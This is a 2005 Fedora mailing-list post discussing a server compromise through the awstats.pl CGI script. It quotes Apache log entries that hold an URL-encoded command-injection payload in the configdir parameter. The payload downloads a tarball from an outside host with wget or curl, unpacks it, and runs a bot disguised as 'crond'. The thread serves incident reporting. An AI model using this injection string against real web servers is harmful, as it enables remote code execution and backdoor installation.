Security Breach
David Cary Hart
Fedora at TQMcube.com
Fri Mar 4 17:39:44 UTC 2005
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
> > 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
> > r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
> > ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi
> > lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20
> > psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
> > 2500 HTTP/1.1" 200 634 "-" "-"
> >
> >
> > -cs
>
> Thank you for this report.
> So you are saying that even with awstats 6.4 you got compromised as
> Apache did execute the logged command and a trojan then started running
> located in /tmp? If so, would you please be so kind and report that
> issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how
this resulted in a compromised machine.
BTW, I am MOST appreciative of people who follow-up on their issues as
Chris did.
Thanks
--
Total Quality Management - A Commitment to Excellence
Fight Spam: http://www.tqmcube.com/rbldnsd.htm
Real Time Updates: rsync -t \
tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam]
http://www.tqmcube.com/spam_trap.htm
More information about the fedora-list
mailing list